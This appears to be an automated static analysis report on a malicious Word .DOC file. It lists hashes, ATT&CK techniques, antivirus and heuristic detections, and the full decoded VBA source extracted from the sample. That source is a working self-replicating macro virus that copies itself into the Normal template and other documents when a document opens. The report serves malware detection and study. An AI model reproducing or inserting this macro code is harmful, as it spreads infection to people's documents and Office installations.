Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 5a7b88eb0e6eff6a…

MALICIOUS

Office (OLE) / .DOC

Size: 31.0 KB
Created: 2024-01-30 08:12:00
Authoring application: WPS Office_12.1.0.16250_F1E327BC-269C-435d-A152-05C5408002CA
First seen: 2026-06-24
MD5: 7cf5e941cbd2dc47b71f57586b1b71cc
SHA-1: 65298ff466558b75c9f33e6e743516f58ef50cd1
SHA-256: 5a7b88eb0e6eff6a092903c41c3668f4c1ac1811de69f35b3827cc209051d789
Risk Score: 148

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder

The file contains VBA macros, specifically a Document_Open macro that copies its own code into the Normal template. Writing to the global template is a common macro-malware technique and indicates an attempt to achieve persistence or to infect other documents.

Heuristics (4)

  • ClamAV: Doc.Macro.APMPKILL-6097118-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.APMPKILL-6097118-0
  • VBA macros detected (severity: medium, 2 related findings, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering (severity: critical, rule: OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
        .DeleteLines 1, .CountOfLines
  • Document_Open macro (severity: low, rule: OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script:
        Private Sub Document_Open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1025 bytes
SHA-256: b6bb40c3324a9a55276682d3a04936515debedc19798cd9b4db60b6bc4ef53ca

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'KILL
   On Error Resume Next
    Set prevDocument = NormalTemplate
    Set prevDocument = ActiveDocument
    Set nextDocument = NormalTemplate
   MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
   Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
   If ThisDocument = NormalTemplate Then _
      Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
   With Host
       If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
          .DeleteLines 1, .CountOfLines
          .InsertLines 1, MyCode
          If ThisDocument = NormalTemplate Then _
             ActiveDocument.SaveAs ActiveDocument.FullName
       End If
   End With
End Sub